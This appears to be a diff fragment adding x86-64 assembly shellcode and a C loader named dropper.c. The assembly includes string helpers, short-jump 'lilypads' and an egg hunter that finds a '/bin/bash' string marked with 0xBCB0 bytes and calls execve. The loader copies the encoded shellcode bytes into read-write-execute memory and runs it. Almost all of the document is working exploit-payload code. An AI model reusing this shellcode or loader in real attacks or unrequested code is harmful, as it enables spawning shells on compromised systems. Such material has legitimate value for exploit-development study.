; current memory location of char in string + cmp [rcx], sil ; is this the null terminator? + je strsize_return + prevent_infinite_loop: + cmp ax, 0x1001 ; compare value in RAX to 0x1001 (prevent infinite mem scanning) + jg strsize_fail2find ; if value in RAX is greater, jump to label + inc rax ; move to the next char in the string + jmp strsize_loop + strsize_fail2find: + xor rax, rax ; return null/ 0x0 + strsize_return: + ret + +lilypad_1: + jmp short lilypad_2 + +; char * string terminateString(&string, terminator); +; RAX RDI RSI +; description: Finds the string terminator and changes it to a null byte +terminateString: + xor rcx, rcx ; set the counter to zero + mov rcx, rdi ; start address to look for terminator + loop_find_terminator: + cmp [rcx], sil ; is this the null terminator? + je found_terminator + inc rcx ; move to the next char in the string + jmp loop_find_terminator + found_terminator: + mov [rcx], al + ret + +; void * dst_addr move_memory(void *dst_addr, void *src_addr, size_t mem_size); +; RAX RDI RSI RDX +; description: Move memory from source address to destination address +; ARG1 - RDI: destination address +; ARG2 - RSI: source address +; ARG3 - RDX: size of the memory +move_memory: + ; Loop through memory and move each byte from source to destination + push rdi ; save the destination address so we can return it at the end + xor rax, rax ; register to temporarily hold the byte we are copying + move_memory_loop: + mov al, [rsi] ; read the byte from source address into the temporary register + mov [rdi], al ; write the byte at the destination address + inc rsi ; increment source address + inc rdi ; increment destination address + dec rdx ; decrement memory size + jnz move_memory_loop ; repeat loop until memory size is 0 + ; Return to caller + pop rax ; return the destination address of the memory to the caller + ret + +lilypad_2: + jmp short lilypad_3 + +; void clear_memory(void *dst_addr, size_t mem_size); +; RDI RSI +; description: Writes 0x00 bytes to a destination address +; ARG1 - RDI: a pointer to the destination address +; ARG2 - RSI: the size of the memory to be written to +clear_memory: + mov rcx, rsi ; load memory size from second argument into rcx + xor rax, rax + ; Loop through memory and write 0x00 to each byte in destination address + clrmem_loop: + mov byte [rdi], al ; write 0x00 to byte in destination address + inc rdi ; increment destination address + dec rcx ; decrement memory size + jnz clrmem_loop ; repeat loop until memory size is 0 + ; Return to caller + ret + +lilypad_3: + ; *string = eggHunter(egg); Starts hunt from return address of caller + find_execve_string: + xor rdi, rdi ; clear register + mov di, 0xBCB0 ; Arg 1: Our egg + call eggHunter ; returns string start address + mov [rbp-0x10], rax ; Save string address + + get_strlen: + mov rdi, [rbp-0x10] ; Arg 1: string start address + xor rsi, rsi ; clear register + mov sil, 0xFF ; Arg 2: string terminator + call strsize ; returns string size + mov [rbp-0x18], rax ; Save string size + + ; move_memory(dst_addr, src_addr, mem_size); + ; RDI RSI RDX + copy_str2stack: + mov rdi, [rbp-0x8] ; Arg 1: String buffer on stack + mov rsi, [rbp-0x10] ; Arg 2: Original string location + mov rdx, [rbp-0x18] ; Arg 3: size + call move_memory + + do_terminate_string: + mov rdx, [rbp-0x18] ; string size + mov rdi, [rbp-0x8] ; String buffer on stack + add rdi, rdx ; Arg 1: string terminator location + xor rsi, rsi ; clear register + mov sil, 0x1 ; Arg 2: mem size to null + call clear_memory ; returns string size + + ; execve("/bin/bash",NULL,NULL) + execve: + mov rdi, [rbp-0x8] ; Arg 1: String buffer on stack + xor rsi, rsi ; Arg 2: NULL + xor rdx, rdx ; Arg 3: NULL + xor rax, rax ; clear register for syscall number setup + mov al, 0x2 ; set a bit in register + ror rax, 0x28 ; move the bit over 28 bits to the right in the register + mov al, 0x3b ; set the lower byte (AL) of the RAX register to the execve syscall number + syscall ; do syscall interrupt + + fixstack: + add rsp, 0x60 ; clear allocated stack space + pop rbp ; restore stack base pointer + ret ; return to caller + +shell_path_string: db 0xB0,0xBC,0xB0,0xBC,"/bin/bash",0xFF + +########################################################################################################################################### + +// dropper.c + +#include +#include +#include +#include +int (*execute_shellcode)(); + +const unsigned char shellcode[] = +"\x55\x48\x89\xe5\x48\x83\xec\x60\x48\x89\x65\xf8\xeb\x3c\x48\x8b\x0c\x24\x48\xff\xc1\x66\x39\x39\x75\xf8\x66\x83\xc1\x02\x66\x39\x39\x75\xef\x66\x83\xc1\x02\x48\x91\xc3\x48\x31\xc0\x48\x31\xc9\x48\x89\xf9\x48\x01\xc1\x40\x38\x31\x74\x0e\x66\x3d\x01\x10\x7f\x05\x48\xff\xc0\xeb\xea\x48\x31\xc0\xc3\xeb\x28\x48\x31\xc9\x48\x89\xf9\x40\x38\x31\x74\x05\x48\xff\xc1\xeb\xf6\x88\x01\xc3\x57\x48\x31\xc0\x8a\x06\x88\x07\x48\xff\xc6\x48\xff\xc7\x48\xff\xca\x75\xf1\x58\xc3\xeb\x11\x48\x89\xf1\x48\x31\xc0\x88\x07\x48\xff\xc7\x48\xff\xc9\x75\xf6\xc3\x48\x31\xff\x66\xbf\xb0\xbc\xe8\x7b\xff\xff\xff\x48\x89\x45\xf0\x48\x8b\x7d\xf0\x48\x31\xf6\x40\xb6\xff\xe8\x84\xff\xff\xff\x48\x89\x45\xe8\x48\x8b\x7d\xf8\x48\x8b\x75\xf0\x48\x8b\x55\xe8\xe8\xa4\xff\xff\xff\x48\x8b\x55\xe8\x48\x8b\x7d\xf8\x48\x01\xd7\x48\x31\xf6\x40\xb6\x01\xe8\xa5\xff\xff\xff\x48\x8b\x7d\xf8\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05\x48\x83\xc4\x60\x5d\xc3\xb0\xbc\xb0\xbc\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\xff"; + + +int main() { + size_t shellcode_size = sizeof(shellcode); + + printf("[+] Shellcode Length: %lu Bytes\n", shellcode_size); + + void *rwx_memory = mmap(0, 0x1024, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0); + + if (rwx_memory == MAP_FAILED) { + printf("[!] Failed to allocate RWX memory\n"); + perror("mmap"); + exit(-1); + } + + printf("[+] Copying shellcode from variable at %p to allocated RWX memory at %p\n",shellcode,rwx_memory); + memcpy(rwx_memory, shellcode, sizeof(shellcode)); + execute_shellcode = rwx_memory; + + printf("[+] Executing shellcode at %p\n",rwx_memory); + execute_shellcode(); + return 0; + +} \ No newline at end of file